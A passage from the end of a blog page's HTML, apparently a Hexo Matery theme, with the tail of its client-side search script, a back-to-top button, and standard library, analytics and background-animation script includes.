                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    
	
     <!--动态线条背景-->
     <script type="text/javascript"
     color="122 103 238" opacity='0.7' zIndex="-2" count="200" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js">
     </script>	
	

</body>

</html>
